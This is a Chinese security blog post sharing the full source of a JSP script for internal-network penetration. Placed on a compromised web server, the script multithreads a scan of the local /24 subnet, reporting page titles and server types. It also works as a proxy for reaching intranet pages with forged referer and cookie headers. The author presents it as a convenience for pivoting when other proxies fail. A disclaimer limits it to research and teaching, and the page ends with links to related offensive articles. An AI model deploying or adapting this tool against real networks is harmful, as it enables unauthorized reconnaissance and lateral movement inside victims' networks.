jsp内网探测脚本&简单代理访问

暗月博客

809
文章

0
评论

2019年11月21日21:28:14评论554 views字数 4957阅读16分31秒阅读模式

摘要

..
1.直接访问默认扫描当前IP的C段，获取标题、web容器.

2.可以自定义传入需要扫描的段，传入参数ip即可

3.代理访问参数为url，可简单的访问内网的web，对了，我还加载了网站里的css，做到尽量看上去和直接访问的效果一样

..
1.直接访问默认扫描当前IP的C段，获取标题、web容器.

2.可以自定义传入需要扫描的段，传入参数ip即可

3.代理访问参数为url，可简单的访问内网的web，对了，我还加载了网站里的css，做到尽量看上去和直接访问的效果一样

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <%@ page isThreadSafe="false"%> <%@page import="java.io.PrintWriter"%> <%@page import="java.io.OutputStreamWriter"%> <%@page import="java.util.regex.Matcher"%> <%@page import="java.io.IOException"%> <%@page import="java.net.InetAddress"%> <%@page import="java.util.regex.Pattern"%> <%@page import="java.net.HttpURLConnection"%> <%@page import="java.util.concurrent.LinkedBlockingQueue"%>  <%!final static List<String> list = new ArrayList<String>();   String referer = "";   String cookie = "";   String decode = "utf-8";   int thread = 100;    HttpURLConnection getHTTPConn(String urlString) {     try {       java.net.URL url = new java.net.URL(urlString);       java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url           .openConnection();       conn.setRequestMethod("GET");       conn.addRequestProperty("User-Agent",           "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)");       conn.addRequestProperty("Accept-Encoding", "gzip");       conn.addRequestProperty("referer", referer);       conn.addRequestProperty("cookie", cookie);       //conn.setInstanceFollowRedirects(false);       conn.setConnectTimeout(3000);       conn.setReadTimeout(3000);        return conn;     } catch (Exception e) {       return null;     }   }    HttpURLConnection conn;    String getHtmlContext(HttpURLConnection conn, String decode) {     Map<String, Object> result = new HashMap<String, Object>();     try {        String code = "utf-8";       if (decode != null) {         code = decode;       }       StringBuffer html = new StringBuffer();       java.io.InputStreamReader isr = new java.io.InputStreamReader(           conn.getInputStream(), code);       java.io.BufferedReader br = new java.io.BufferedReader(isr);        String temp;       while ((temp = br.readLine()) != null) {         if (!temp.trim().equals("")) {           html.append(temp).append("/n");         }       }       br.close();       isr.close();       return html.toString();     } catch (Exception e) {       System.out.println("getHtmlContext:"+e.getMessage());       return "null";     }   }    String getServerType(HttpURLConnection conn) {     try {       return conn.getHeaderField("Server");     } catch (Exception e) {       return "null";     }    }    String getTitle(String htmlSource) {     try {       List<String> list = new ArrayList<String>();       String title = "";       Pattern pa = Pattern.compile("<title>.*?</title>");       Matcher ma = pa.matcher(htmlSource);       while (ma.find()) {         list.add(ma.group());       }       for (int i = 0; i < list.size(); i++) {         title = title + list.get(i);       }       return title.replaceAll("<.*?>", "");     } catch (Exception e) {       return null;     }   }    List<String> getCss(String html, String url, String decode) {     List<String> cssurl = new ArrayList<String>();     List<String> csscode = new ArrayList<String>();     try {        String title = "";       Pattern pa = Pattern.compile(".*href=/"(.*)[.]css");       Matcher ma = pa.matcher(html.toLowerCase());       while (ma.find()) {         cssurl.add(ma.group(1) + ".css");       }        for (int i = 0; i < cssurl.size(); i++) {         String cssuuu = url + "/" + cssurl.get(i);         String csshtml = "<style>"             + getHtmlContext(getHTTPConn(cssuuu), decode)             + "</style>";         csscode.add(csshtml);        }     } catch (Exception e) {       System.out.println("getCss:"+e.getMessage());     }     return csscode;    }    String getMyIPLocal() throws IOException {     InetAddress ia = InetAddress.getLocalHost();     return ia.getHostAddress();   }%> <%   String u = request.getParameter("url");   String ip = request.getParameter("ip");    if (u != null) {     decode = request.getParameter("decode");     String ref = request.getParameter("referer");     String cook = request.getParameter("cookie");     if (ref != null) {       referer = ref;     }     if (cook != null) {       cookie = cook;     }     String html = getHtmlContext(getHTTPConn(u), decode);     List<String> css = getCss(html, u, decode);     String csshtml = "";     if (!html.equals("null")) {        for (int i = 0; i < css.size(); i++) {         csshtml += css.get(i);       }       out.print(html + csshtml);     } else {       response.setStatus(HttpServletResponse.SC_NOT_FOUND);       out.print("请求失败！");     }      return;   }    else if (ip != null || u == null) {     String threadpp = (request.getParameter("thread"));     if (threadpp != null) {       thread = Integer.parseInt(threadpp);       System.out.println(threadpp);     }     try {       try {         String http = "http://";         String localIP = getMyIPLocal();         if (ip != null) {           localIP = ip;         }         String useIP = localIP.substring(0,             localIP.lastIndexOf(".") + 1);         final Queue<String> queue = new LinkedBlockingQueue<String>();         for (int i = 1; i <= 256; i++) {           String url = http + useIP + i;           queue.offer(url);         }         final JspWriter pw = out;         ThreadGroup tg = new ThreadGroup("c");         for (int i = 0; i < thread; i++) {           new Thread(tg, new Runnable() {             public void run() {               while (true) {                 String addr = queue.poll();                 if (addr != null) {                   System.out.println(addr);                   HttpURLConnection conn = getHTTPConn(addr);                   String html = getHtmlContext(conn,                       decode);                   String title = getTitle(html);                   String serverType = getServerType(conn);                   String status = !html                       .equals("null") ? "Success"                       : "Fail";                   if (html != null                       && !status.equals("Fail")) {                     try {                       pw.println(addr + "  >>  "+ title + ">>"+ serverType+ " >>" + status+ "<br/>");                     } catch (Exception e) {                       e.printStackTrace();                     }                   }                 } else {                   return;                 }               }             }           }).start();         }         while (tg.activeCount() != 0) {         }       } catch (Exception e) {         e.printStackTrace();       }     } catch (Exception e) {       out.println(e.toString());     }   } %>

参数：
ip [需要探测的ip段]

url [需要请求的地址]

其他参数：

thread [指定线程数]

decode [指定编码]

referer [伪造referer]

cookie [伪造cookie]

待完善：
1.一个C段，可能有多种编码格式，所以指定一个参数是有问题的。

2.端口可以修改传入一个数组，支持探测多个端口80，8080..

3.代理访问功能并不完善，例如加载js、加载图片、超链接替换成代理访问的链接、表单替换支持真实请求..

对了，其实这个主要是用于偷懒或者内网渗透时，各种代理总是遇到问题出不来。坐等大神写个完善版本的。
（我自己来还得慢慢改。）

PS：很久没写代码，代码渣，多线程还是没学会。看来代码就是得天天写才能熟练。

Link：http://pan.baidu.com/s/1qWDsv3e

本地下载

out.rar

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

jsp内网探测脚本&简单代理访问

PHP 函数漏洞总结

xise菜刀的密文解密工具

逆向工程学习第一天--一个VC6编译的小程序

从后台弱口令到内网漫游

Burp Suite Professional 2.1.05 最新版本下载

Hacking Oracle PART 1

分享一款失败的国产加密勒索软件

NSO到底是个什么样的公司？揭秘三叉戟0day的缔造者

GitHub上10个最受欢迎的安全项目

齐博CMS splitword.php后门解密

发表评论

在线咨询

微信